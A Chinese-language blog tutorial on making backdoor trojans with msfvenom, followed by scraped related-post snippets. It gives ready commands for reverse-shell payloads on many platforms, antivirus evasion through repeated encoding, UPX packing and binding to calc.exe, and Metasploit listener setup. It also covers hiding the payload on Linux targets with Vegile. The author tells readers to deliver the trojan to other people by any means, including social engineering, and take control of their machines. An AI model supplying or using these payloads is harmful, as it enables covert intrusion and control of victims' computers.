Msfvenonm生成后门
目录
Msfvenom
生成exe木马
生成Linux木马
方法一:
方法二:
在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法。传送门——>Metasploit之Meterpreter
今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接。我们可以通过这条TCP连接控制目标主机。
Msfvenom
- –p (- -payload-options):添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT,就可以生成对应语言,对应平台的后门了!!!
- –l:查看所有payload encoder nops。
- –f :输出文件格式。
- –e:编码免杀。
- –a:选择架构平台 x86 | x64 | x86_64
- –o:文件输出
- –s:生成payload的最大长度,就是文件大小。
- –b:避免使用的字符 例如:不使用 ‘\0f’。
- –i:编码次数。
- –c:添加自己的shellcode
- –x | -k:捆绑
- 安卓app:
- msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -o ~/Desktop/test2.apk
- Linux:
- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f elf > shell.elf
- Mac:
- msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f macho > shell.macho
- PHP:
- msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.php
- ASP:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f asp > shell.asp
- ASPX:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f aspx > shell.aspx
- JSP:
- msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f raw > shell.jsp
- Bash:
- msfvenom -p cmd/unix/reverse_bash LHOST=192.168.10.27 LPORT=8888 -f raw > shell.sh
- Perl
- msfvenom -p cmd/unix/reverse_perl LHOST=192.168.10.27 LPORT=8888 -f raw > shell.pl
- Python
- msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.10.27 LPORT=8888 -f raw > shell.py
生成exe木马
- msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.27 lport=8888 -f exe -o test.exe #lhost是我们的主机ip,lport是我们主机的用于监听的端口
- msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.27 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o test.exe #编码3次
然后会在该目录下生成一个test.exe的木马。
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 20 lhost=192.168.10.11 lport=8888 -x calc.exe -f exe -o test.exe #编码20次、捆绑正常的32位calc.exe,生成32位的test.exe文件
利用 upx 加壳
upx -9 test.exe -k -o test2.exe
接下来,我们运行 msfconsole 进入MSF控制台,然后输入以下命令
- msf > use exploit/multi/handler #使用exploit/multi/handler监听从肉鸡发来的数据
- msf exploit(handler) > set payload windows/meterpreter/reverse_tcp #设置payload,不同的木马设置不同的payload
- msf exploit(handler) > set lhost 192.168.10.15 #我们的主机ip
- msf exploit(handler) > set lport 8888 #我们的主机端口
- msf exploit(handler) > exploit
然后,将木马发送给其他人,无论使用什么手段(可以使用社会工程学)让其在其他主机上运行,我们这边就会接收到反弹过来的session。
因为我们刚刚把进程挂在后台,所以我们输入:sessions -l 可以查看到我们得到的shell,使用 sessions -i 1 可以进入指定的shell,我们这里只有一个,所以id为1。如图,我们成功拿到了其他主机的shell
生成Linux木马
方法一:
执行以下命令会生成一个elf文件
- #生成32位的马
- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=VPS的地址 LPORT=8888 -f elf > test.elf
- #生成64位的马
- msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=VPS的地址 LPORT=8888 -f elf > test.elf
然后MSF开启监听
- use exploit/multi/handler
- set payload linux/x64/meterpreter/reverse_tcp
- set LHOST 0.0.0.0
- set LPORT 8888
- exploit -j
将该elf文件上传到目标机器,添加可执行权限,然后执行即可
方法二:
首先,在我们的Kali上生成一个Linux类型的木马test
msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=VPS的地址 LPORT=8888 -b "\x00" -f elf -o test
在目标机器上下载Vegile,命令如下,然后将 test 传到Vegile目录下
- git clone https://github.com/Screetsec/Vegile.git
- cd Vegile
- chmod +x Vegile
在Kali上开启监听如下
- use exploit/multi/hander
- set payload linux/x86/shell/reverse_tcp
- set lhost 192.168.10.13
- set lport 8888
- exploit -j
然后在目标及执行如下
- ./Vegile --u test
- 或
- ./Vegile --i test
然后我们的VPS就可以收到目标机器弹回来的shell了。
关于后渗透阶段如何使用Meterpreter,传送门——>后渗透阶段Meterpreter的使用
Msfvenonm生成后门相关推荐
- Msfvenonm生成后门木马
目录 Msfvenom 生成exe木马 生成Linux木马 方法一: 方法二: 在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法.传送门-->M
- mysql定时木马_Mysql的语句生成后门木马的方法
咳咳,大家看看就好了,本人不负责所产生的后果 复制代码 代码如下: SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702 ...
- mysql后门_运用Mysql语句生成后门具体办法
软件安装:装机软件必备包 随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题.特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁. 通过M ...
- mysql 木马_用Mysql语句来生成后门木马方案
下面的文章主要是介绍又如何通过MySQL(和PHP搭配之***组合) 的Mysql语句来生成后门木马的具体操作方法!以下的文章主要是通过相关代码的方式来引出Mysql语句生成后门木马的具体操作方案. ...
- 利用mysql上传木马_通过Mysql语句生成后门木马的方法_MySQL
通过Mysql 的语句生成后门木马的方法! SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656 ...
- 利用msfvenom生成后门木马
msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload an ...
- 渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
MsfVenom 首先msf就是Metaaploit,venom就是病毒.msfvenom是msfpayload和msfencode的组合.将这两个工具集成在一个框架实例中.进一步来说,msfveno ...
- kali生成后门远程控制电脑或手机
一.复现环境 Kali平台(Hack):192.168.25.128 靶机:192.168.25.106 Android模拟器(靶机1):192.168.25.106 注意,手机端控制必须使手机和 ...
- mysql上传木马_通过Mysql语句生成后门木马的方法_MySQL
通过Mysql 的语句生成后门木马的方法! SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656 ...
最新文章
- 华为手机升级回退_华为鸿蒙OS 2.0手机开发者Beta版支持Mate 30/P40系列OTA升级
- 《正则表达式必知必会》读书笔记
- python自学步骤-Python入门深度学习完整指南
- php获取本月工作日,ThinkPHP中获取指定日期后工作日的具体日期方法
- 对计算机财务管理的理解,计算机财务管理
- Problem(三):工作中的记录。。。。
- SPOJ371 Boxes(最小费用最大流)
- tf.transpose()个人理解,高纬度的变换,可以将部分维度看成黑盒(整体)
- 爱了爱了!推荐一个Github 70k+点赞的Java学习指南!
- 前端在H5页面唤起微信支付(H5支付)
- 如何按关键字搜索商品详情
- 六年级计算机课件,六年级信息技术上册课件.ppt
- 如何录制英雄联盟 (LoL) 游戏视频
- 2022年12月奥鹏网络教育大学英语B统考题库试题
- Linux帐号和登录安全
- springboot多环境配置--bunny0728
- python读入tsv_PYTHON读取TXT/CSV/TSV 数据
- 当我们谈BIM的时候,我们在谈什么?
- 工程技术人员以计算机为辅助工具,上海工程技术大学机械CADCAM考试复习资料
- 如何使自己跳得更高?------学习跳蚤效应的五点体会
热门文章
- 零基础学Python(第九章 循环控制【break】与【continue】)
- Oracle查看正在执行的存储过程的sid
- Implementation of WC in JAVA
- Java Web学习总结(3)Servlet(二)
- Deep Learning 教程翻译
- ZOJ3865:Superbot(BFS) The 15th Zhejiang University Programming Contest
- 使用SDL打造游戏世界之入门篇 - 4
- oracle 根据值不同具有不同的搜索条件_在Navicat Premium中执行数据库范围内的搜索...
- 每日程序C语言12-统计字符个数
- sql left join用法_一张图看懂 SQL 的各种 join 用法!